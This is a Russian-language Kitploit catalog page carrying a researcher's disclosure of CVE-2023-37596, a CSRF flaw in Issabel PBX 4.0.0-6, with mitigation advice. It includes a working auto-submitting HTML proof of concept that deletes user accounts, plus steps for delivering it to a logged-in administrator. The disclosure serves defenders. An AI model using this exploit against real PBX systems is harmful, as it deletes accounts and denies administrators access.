Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-37596 — CVE-2023-37596 - это уязвимость межсайтовой подделки запроса (CSRF), обнаруженная в Issabel PBX версии 4.0.0-6, широко используемой платформе унифицированных коммуникаций с открытым исходным кодом. | Kitploit
Инструменты/GitHubGitHub/sahiloj/cve-2023-37596
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596 - это уязвимость межсайтовой подделки запроса (CSRF), обнаруженная в Issabel PBX версии 4.0.0-6, широко используемой платформе унифицированных коммуникаций с открытым исходным кодом.

Репозиторий
1116 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-37596 — issabel-pbx 4.0.0-6: Межсайтовая подделка запроса (CSRF) — Удаление любого пользователя

Серьезность: Высокая  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


Содержание

  • Обзор
  • Сведения об уязвимости
  • Влияние
  • Затронутая версия
  • Сценарий атаки
  • Подтверждение концепции (шаги для воспроизведения)
  • Смягчение / Устранение
  • Ссылки
  • График раскрытия
  • Автор

Обзор

Уязвимость Межсайтовая подделка запроса (CSRF) была обнаружена в Issabel PBX версии 4.0.0-6. Конечная точка управления пользователями не реализует никакой защиты от CSRF, что позволяет неаутентифицированному удаленному злоумышленнику создать вредоносную веб-страницу, которая — при посещении аутентифицированным администратором Issabel — незаметно удаляет любую учетную запись пользователя из системы. Многократная эксплуатация может сделать все приложение недоступным при удалении всех административных пользователей.


Сведения об уязвимости

ПолеЗначение
Идентификатор CVECVE-2023-37596
Тип уязвимостиМежсайтовая подделка запроса (CSRF)
CWECWE-352
ПродуктIssabel PBX
Уязвимая версия4.0.0-6
Домашняя страница вендораhttps://www.issabel.org/
Репозиторий ПОhttps://github.com/IssabelFoundation/issabelPBX
Протестировано наWindows
Опубликовано CVE10/07/2023
ОбнаруженоSahil Ojha

Влияние

Поскольку Issabel PBX не проверяет источник запросов, изменяющих состояние, в своем интерфейсе управления пользователями, успешная CSRF-атака позволяет злоумышленнику:

  • Удалить любую учетную запись пользователя — включая основного администратора — без ведома жертвы.
  • Вызвать отказ в обслуживании (DoS) — при удалении всех пользователей никто не может войти в систему, что делает панель администрирования PBX полностью недоступной.
  • Нарушить работу телефонных услуг — конфигурация и управление телефонной системой становятся недоступными до тех пор, пока учетная запись не будет восстановлена вручную на уровне сервера.

Затронутая версия

ПродуктЗатронутая версияСтатус
issabel-pbx4.0.0-6Уязвим

Сценарий атаки

Злоумышленник размещает вредоносную HTML-страницу, содержащую поддельный HTTP-запрос к конечной точке удаления пользователя приложения Issabel PBX. Атака срабатывает автоматически (или по клику на кнопку), когда пользователь, уже аутентифицированный в Issabel, посещает эту вредоносную страницу в том же браузере. Поскольку браузер автоматически включает файлы cookie сеанса жертвы в каждый запрос, сервер принимает поддельный запрос на удаление как легитимный.

Со стороны злоумышленника не требуется никаких специальных привилегий — только вектор социальной инженерии (фишинговая ссылка, вредоносная реклама и т. д.), чтобы заманить аутентифицированного администратора на подготовленную страницу.

Ключевые характеристики этой атаки:

  • Аутентификация не требуется со стороны злоумышленника.
  • Одним щелчком (или даже без щелчков, если используются `` / автоотправляемые формы) достаточно для запуска эксплойта.
  • Любой идентификатор пользователя (например, id=1, id=2, ...) может быть целью при изменении полезной нагрузки.
  • Атака невидима для жертвы; страница может отображать не связанный с атакой контент, в то время как поддельный запрос отправляется незаметно.

Подтверждение концепции (шаги для воспроизведения)

Предварительные требования

  • Burp Suite (Community или Professional редакция)
  • Браузер, настроенный на проксирование трафика через Burp Suite
  • Экземпляр Issabel PBX 4.0.0-6, доступный в сети

Шаг 1 — Вход в систему как администратор

Перейдите на страницу списка пользователей Issabel PBX и аутентифицируйтесь с помощью учетных данных администратора:

root@kitploit:~
https://<Issabel-IP>/index.php?menu=userlist

Шаг 1 — Список пользователей Issabel PBX


Шаг 2 — Захват запроса на удаление пользователя в Burp Suite

  1. При активном прокси Burp Suite нажмите кнопку Delete рядом с целевым пользователем.
  2. В Proxy → HTTP history Burp Suite найдите захваченный DELETE/POST-запрос.
  3. Щелкните правой кнопкой мыши по запросу и выберите Engagement Tools → Generate CSRF PoC.

Шаг 2 — Захват запроса на удаление в Burp Suite


Шаг 3 — Генерация и сохранение CSRF-эксплойта

Burp Suite создаст HTML-страницу, аналогичную приведенной ниже. Сохраните ее как .html файл (например, csrf_exploit.html):

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form as soon as the page loads
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Примечание: Замените <Issabel-IP> на IP-адрес или имя хоста целевого сервера и измените значение id, чтобы атаковать другую учетную запись пользователя.


Шаг 4 — Доставка эксплойта аутентифицированному администратору

Отправьте файл csrf_exploit.html (или ссылку на место, где он размещен) пользователю, который в данный момент вошел в Issabel PBX. Когда жертва откроет страницу, форма будет отправлена автоматически, и целевой пользователь будет удален без какого-либо запроса подтверждения.

Шаг 4 — CSRF-эксплойт выполнен, пользователь удален

Шаг 4 — Подтверждение удаления пользователя


Смягчение / Устранение

Следующие меры защиты должны быть применены вендором и/или системными администраторами для устранения этой уязвимости:

  1. Внедрение CSRF-токенов — Генерируйте криптографически случайный, привязанный к сессии (или к запросу) токен и проверяйте его на стороне сервера для каждого запроса, изменяющего состояние. Запросы, не содержащие действительный токен, должны отклоняться.

  2. Атрибут SameSite для cookie — Установите для сессионной cookie атрибут SameSite в значение Strict или Lax, чтобы предотвратить отправку сессионной cookie в кросс-доменных запросах в большинстве браузеров.

  3. Проверка заголовков Origin / Referer — На стороне сервера отклоняйте любой запрос, изменяющий состояние, в котором заголовок Origin или Referer не соответствует собственному домену приложения.

  4. Требуйте повторную аутентификацию для деструктивных действий — Запрашивайте повторный ввод пароля перед обработкой необратимых действий, таких как удаление учетных записей пользователей.

  5. Применяйте принцип наименьших привилегий — Убедитесь, что только пользователи с явной ролью администратора могут получить доступ к функции удаления пользователей, что уменьшает радиус поражения успешной атаки.

До выхода патча от вендора администраторам рекомендуется:

  • Ограничить доступ к панели администрирования Issabel PBX только доверенными IP-адресами с помощью правил брандмауэра.
  • Избегать посещения недоверенных веб-сайтов во время работы в панели администратора.

Ссылки

  • NVD — CVE-2023-37596
  • OWASP — Межсайтовая подделка запроса (CSRF)
  • CWE-352: Межсайтовая подделка запроса (CSRF)
  • Официальный сайт Issabel PBX
  • IssabelFoundation/issabelPBX на GitHub
  • PortSwigger — CSRF

График раскрытия

ДатаСобытие
10/07/2023Уязвимость обнаружена и сообщена
10/07/2023Назначен CVE-2023-37596

Автор

Sahil Ojha

  • Исследователь безопасности
  • CVE: CVE-2023-37596

Отказ от ответственности: Этот репозиторий опубликован исключительно в образовательных целях и для ответственного раскрытия информации. Предоставленная информация не должна использоваться для атак на системы без явного письменного разрешения владельца системы. Автор не несет ответственности за любое неправомерное использование этой информации.

Скачать инструмент